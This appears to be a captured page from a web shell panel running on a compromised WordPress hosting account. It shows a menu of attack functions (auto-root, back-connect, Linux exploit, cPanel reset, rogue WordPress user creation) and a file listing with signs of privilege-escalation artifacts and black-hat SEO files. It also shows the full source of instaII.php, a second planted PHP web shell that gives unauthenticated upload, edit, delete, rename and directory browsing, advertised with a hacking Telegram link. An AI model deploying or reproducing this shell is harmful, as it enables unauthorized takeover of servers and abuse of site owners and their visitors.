Linux server220.web-hosting.com 4.18.0-553.45.1.lve.el8.x86_64 #1 SMP Wed Mar 26 12:08:09 UTC 2025 x86_64
LiteSpeed
: 198.54.116.164 | : 216.73.216.27
Cant Read [ /etc/named.conf ]
7.4.33
adnangch
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
home /
adnangch /
public_html /
[ HOME SHELL ]
Name
Size
Permission
Action
.pkexec
[ DIR ]
drwxr-xr-x
.well-known
[ DIR ]
drwxr-xr-x
0ed2c
[ DIR ]
dr-xr-xr-x
50a8ed
[ DIR ]
drwxr-xr-x
GCONV_PATH=.
[ DIR ]
drwxr-xr-x
wp-admin
[ DIR ]
drwxr-xr-x
wp-content
[ DIR ]
dr-xr-xr-x
wp-includes
[ DIR ]
drwxr-xr-x
.htaccess
231
B
-rw-r--r--
.index.php
2.46
KB
-rwxrwxrwx
.litespeed_flag
297
B
-rw-r--r--
.mad-root
0
B
-rw-r--r--
2fsrebiw.php
1.83
KB
-rw-r--r--
6pqi51i0.php
1.83
KB
-rw-r--r--
buy.php
5.55
KB
-rw-r--r--
context.php
1.05
KB
-rw-r--r--
csv.php
6.46
KB
-rw-r--r--
error_log
87.03
KB
-rw-r--r--
google738db57e59672eb9.html
53
B
-rw-r--r--
google8fab2a5bdb4dc80e.html
53
B
-rw-r--r--
googlecb7c0319e31f0be0.html
53
B
-rw-r--r--
googled24b00a99624db3b.html
53
B
-rw-r--r--
googledc308e72d25873da.html
53
B
-rw-r--r--
htaccess
618
B
-rw-r--r--
index.php
5.55
KB
-rw-r--r--
index.php0
8.38
KB
-rw-r--r--
instaII.php
4.82
KB
-rw-r--r--
robots.txt
413
B
-r--r--r--
wp-test.php
1.76
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : instaII.php
<?php // GAI-SEO TG session_start(); // Mevcut dizin $currentDir = $_GET['dir'] ?? __DIR__; function handleUpload($directory) { if ($_FILES) { $targetFile = $directory . DIRECTORY_SEPARATOR . basename($_FILES['file']['name']); $message = move_uploaded_file($_FILES['file']['tmp_name'], $targetFile) ? "<p>上传好啦</p>" : "<p>失败了.操</p>"; echo $message; } } function handleCreateFolder($directory) { if ($_POST['folderName']) { $newFolder = $directory . DIRECTORY_SEPARATOR . $_POST['folderName']; $message = !is_dir($newFolder) ? (mkdir($newFolder) ? "<p>上传好啦.</p>" : "<p>失败了.操</p>") : "<p>Folder already exists.</p>"; echo $message; } } function handleCreateFile($directory) { if ($_POST['fileName']) { $newFile = $directory . DIRECTORY_SEPARATOR . $_POST['fileName']; $message = !file_exists($newFile) ? (file_put_contents($newFile, '') !== false ? "<p>File created successfully.</p>" : "<p>Error creating file.</p>") : "<p>File already exists.</p>"; echo $message; } } function handleEditFile($filePath) { if ($_POST['content']) { file_put_contents($filePath, $_POST['content']); echo "<p>File saved successfully.</p>"; } $content = file_get_contents($filePath); echo "<form method='POST'>"; echo "<textarea name='content' style='width:100%; height:300px;'>$content</textarea><br>"; echo "<input type='submit' value='Save'>"; echo "</form>"; } function handleDeleteFile($filePath) { if (file_exists($filePath)) { unlink($filePath); echo "<p>File deleted successfully.</p>"; } } function handleRenameFile($filePath) { if ($_POST['newName']) { $newPath = dirname($filePath) . DIRECTORY_SEPARATOR . $_POST['newName']; rename($filePath, $newPath); echo "<p>File renamed successfully.</p>"; } } function displayDirectory($directory) { $files = array_diff(scandir($directory), array('.', '..')); echo "<div><h3>Files in '$directory'</h3><ul>"; foreach ($files as $file) { $path = realpath("$directory/$file"); $style = getFileStatus($path); $isDir = is_dir($path) ? 'directory' : 'file'; echo "<li class='$isDir' style='$style'>"; echo $isDir === 'directory' ? "<a href='?dir=$path'>$file</a>" : "$file - " . generateFileActions($directory, $file); echo "</li>"; } echo "</ul></div>"; } function getFileStatus($path) { if (is_writable($path) && is_readable($path)) { return "border-left: 4px solid green;"; } elseif (!is_writable($path)) { return "border-left: 4px solid red;"; } elseif (is_readable($path)) { return "border-left: 4px solid white;"; } return ""; } function generateFileActions($directory, $file) { return "<a href='?dir=$directory&action=edit&file=$file'>Edit</a> | <a href='?dir=$directory&action=delete&file=$file'>Delete</a> | <a href='?dir=$directory&action=rename&file=$file'>Rename</a>"; } function handleFileActions($filePath) { if (isset($_GET['action'])) { switch ($_GET['action']) { case 'edit': handleEditFile($filePath); break; case 'delete': handleDeleteFile($filePath); break; case 'rename': handleRenameFile($filePath); break; default: break; } } } echo "<p>Current Directory: <strong>$currentDir</strong></p>"; echo "<p><a href='?dir=" . dirname($currentDir) . "'>Go up</a></p>"; if (isset($_GET['action'])) { $filePath = $currentDir . DIRECTORY_SEPARATOR . $_GET['file']; handleFileActions($filePath); } displayDirectory($currentDir); // File upload form echo "<a href=\"https://t.me/hacker6p\">黑帽劫持技术TG</a>\n"; echo "<h3>Google SEO</h3><form method='POST' enctype='multipart/form-data'>"; echo "<input type='file' name='file'>"; echo "<input type='submit' value='Upload'>"; echo "</form>"; // 创建目录 form echo "<h3>创建目录</h3><form method='POST'>"; echo "<input type='text' name='folderName' placeholder='目录名称'>"; echo "<input type='submit' value='Create Folder'>"; echo "</form>"; // 创建文件 form echo "<h3>创建文件</h3><form method='POST'>"; echo "<input type='text' name='fileName' placeholder='文件名称'>"; echo "<input type='submit' value='Create File'>"; echo "</form>"; if ($_SERVER['REQUEST_METHOD'] === 'POST') { handleUpload($currentDir); handleCreateFolder($currentDir); handleCreateFile($currentDir); } ?>
Close